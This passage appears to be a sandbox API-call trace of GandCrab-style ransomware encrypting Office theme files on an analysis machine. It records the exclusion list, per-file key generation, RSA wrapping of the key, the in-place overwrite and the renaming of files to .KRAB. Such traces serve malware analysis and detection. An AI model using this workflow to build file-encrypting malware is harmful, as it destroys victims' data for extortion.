lpString2="thumbs.db") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="ntldr") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="NTDETECT.COM") returned 1 [0062.957] lstrcmpiW (lpString1="TM03090430[[fn=Banded]].thmx", lpString2="Bootfont.bin") returned 1 [0062.957] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0062.957] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbba18) returned 1 [0062.958] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0062.959] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.959] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.959] CryptGenRandom (in: hProv=0xfbba18, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0062.959] CryptReleaseContext (hProv=0xfbba18, dwFlags=0x0) returned 1 [0062.959] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.959] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb330) returned 1 [0062.960] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0062.960] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0062.960] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0062.961] CryptGenRandom (in: hProv=0xfbb330, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0062.961] CryptReleaseContext (hProv=0xfbb330, dwFlags=0x0) returned 1 [0062.961] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.961] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbb990) returned 1 [0062.961] CryptImportKey (in: hProv=0xfbb990, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdee0) returned 1 [0062.961] CryptGetKeyParam (in: hKey=0xfbdee0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0062.961] CryptEncrypt (in: hKey=0xfbdee0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0062.962] GetLastError () returned 0x0 [0062.962] CryptDestroyKey (hKey=0xfbdee0) returned 1 [0062.962] CryptReleaseContext (hProv=0xfbb990, dwFlags=0x0) returned 1 [0062.962] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbbb0) returned 1 [0062.962] CryptImportKey (in: hProv=0xfbbbb0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdb20) returned 1 [0062.962] CryptGetKeyParam (in: hKey=0xfbdb20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0062.963] CryptEncrypt (in: hKey=0xfbdb20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0062.963] GetLastError () returned 0x0 [0062.963] CryptDestroyKey (hKey=0xfbdb20) returned 1 [0062.963] CryptReleaseContext (hProv=0xfbbbb0, dwFlags=0x0) returned 1 [0062.963] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0062.964] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0062.964] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0062.964] ReadFile (in: hFile=0x478, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x893c1, lpOverlapped=0x0) returned 1 [0063.044] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff76c3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.045] WriteFile (in: hFile=0x478, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x893c1, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x893c1, lpOverlapped=0x0) returned 1 [0063.046] WriteFile (in: hFile=0x478, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0063.046] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.050] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.052] CloseHandle (hObject=0x478) returned 1 [0063.061] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.061] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090430[[fn=banded]].thmx.krab")) returned 1 [0063.062] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.063] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0063.063] lstrcmpW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2=".") returned 1 [0063.063] lstrcmpW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="..") returned 1 [0063.063] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03090434[[fn=Wood Type]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" [0063.063] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0063.063] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx.KRAB") returned 138 [0063.063] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0063.063] lstrlenW (lpString=".thmx") returned 5 [0063.063] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.063] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0063.064] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0063.064] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx") returned 133 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="desktop.ini") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="autorun.inf") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntuser.dat") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="iconcache.db") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="bootsect.bak") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="boot.ini") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntuser.dat.log") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="thumbs.db") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="ntldr") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="NTDETECT.COM") returned 1 [0063.064] lstrcmpiW (lpString1="TM03090434[[fn=Wood Type]].thmx", lpString2="Bootfont.bin") returned 1 [0063.064] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.065] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb220) returned 1 [0063.065] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0063.066] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.066] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.066] CryptGenRandom (in: hProv=0xfbb220, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0063.066] CryptReleaseContext (hProv=0xfbb220, dwFlags=0x0) returned 1 [0063.066] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.066] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbb198) returned 1 [0063.067] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f40000 [0063.067] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.067] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.087] CryptGenRandom (in: hProv=0xfbb198, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0063.087] CryptReleaseContext (hProv=0xfbb198, dwFlags=0x0) returned 1 [0063.087] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.087] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbb28) returned 1 [0063.088] CryptImportKey (in: hProv=0xfbbb28, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd1e0) returned 1 [0063.088] CryptGetKeyParam (in: hKey=0xfbd1e0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.088] CryptEncrypt (in: hKey=0xfbd1e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.088] GetLastError () returned 0x0 [0063.088] CryptDestroyKey (hKey=0xfbd1e0) returned 1 [0063.088] CryptReleaseContext (hProv=0xfbbb28, dwFlags=0x0) returned 1 [0063.088] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbbff0) returned 1 [0063.089] CryptImportKey (in: hProv=0xfbbff0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbd6a0) returned 1 [0063.089] CryptGetKeyParam (in: hKey=0xfbd6a0, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.089] CryptEncrypt (in: hKey=0xfbd6a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.089] GetLastError () returned 0x0 [0063.089] CryptDestroyKey (hKey=0xfbd6a0) returned 1 [0063.089] CryptReleaseContext (hProv=0xfbbff0, dwFlags=0x0) returned 1 [0063.089] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0063.090] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0063.090] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0063.091] ReadFile (in: hFile=0x478, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x100000, lpOverlapped=0x0) returned 1 [0063.189] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.189] WriteFile (in: hFile=0x478, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x100000, lpOverlapped=0x0) returned 1 [0063.191] ReadFile (in: hFile=0x478, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x92bb1, lpOverlapped=0x0) returned 1 [0063.205] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff6d44f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.205] WriteFile (in: hFile=0x478, lpBuffer=0x3870000*, nNumberOfBytesToWrite=0x92bb1, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesWritten=0x338ddf8*=0x92bb1, lpOverlapped=0x0) returned 1 [0063.206] WriteFile (in: hFile=0x478, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0063.206] VirtualFree (lpAddress=0x35e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.232] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.236] CloseHandle (hObject=0x478) returned 1 [0063.270] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.270] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03090434[[fn=wood type]].thmx.krab")) returned 1 [0063.271] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.272] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0063.272] lstrcmpW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2=".") returned 1 [0063.272] lstrcmpW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="..") returned 1 [0063.272] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\", lpString2="TM03457444[[fn=Basis]].thmx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" [0063.272] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0063.272] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx.KRAB") returned 134 [0063.272] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0063.272] lstrlenW (lpString=".thmx") returned 5 [0063.272] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.272] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".thmx ") returned 6 [0063.273] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0063.273] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx") returned 129 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="desktop.ini") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="autorun.inf") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntuser.dat") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="iconcache.db") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="bootsect.bak") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="boot.ini") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntuser.dat.log") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="thumbs.db") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="KRAB-DECRYPT.html") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="KRAB-DECRYPT.txt") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="CRAB-DECRYPT.txt") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="ntldr") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="NTDETECT.COM") returned 1 [0063.273] lstrcmpiW (lpString1="TM03457444[[fn=Basis]].thmx", lpString2="Bootfont.bin") returned 1 [0063.273] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0063.274] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0063.274] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0063.275] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.275] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.275] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0063.275] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.275] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.275] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0xfbca08) returned 1 [0063.276] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f60000 [0063.276] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0063.276] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0063.276] CryptGenRandom (in: hProv=0xfbca08, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0063.276] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.276] VirtualFree (lpAddress=0x2f60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.277] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0063.277] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.277] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.277] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.278] GetLastError () returned 0x0 [0063.278] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.278] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.278] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0xfbca08) returned 1 [0063.278] CryptImportKey (in: hProv=0xfbca08, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0xfbdc20) returned 1 [0063.278] CryptGetKeyParam (in: hKey=0xfbdc20, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0063.278] CryptEncrypt (in: hKey=0xfbdc20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0063.279] GetLastError () returned 0x0 [0063.279] CryptDestroyKey (hKey=0xfbdc20) returned 1 [0063.279] CryptReleaseContext (hProv=0xfbca08, dwFlags=0x0) returned 1 [0063.279] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\document themes\\1033\\tm03457444[[fn=basis]].thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x478 [0063.279] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x35e0000 [0063.279] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0063.280] ReadFile (in: hFile=0x478, lpBuffer=0x35e0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x35e0000*, lpNumberOfBytesRead=0x338ddfc*=0x883d3, lpOverlapped=0x0) returned 1 [0063.341] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfff77c2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 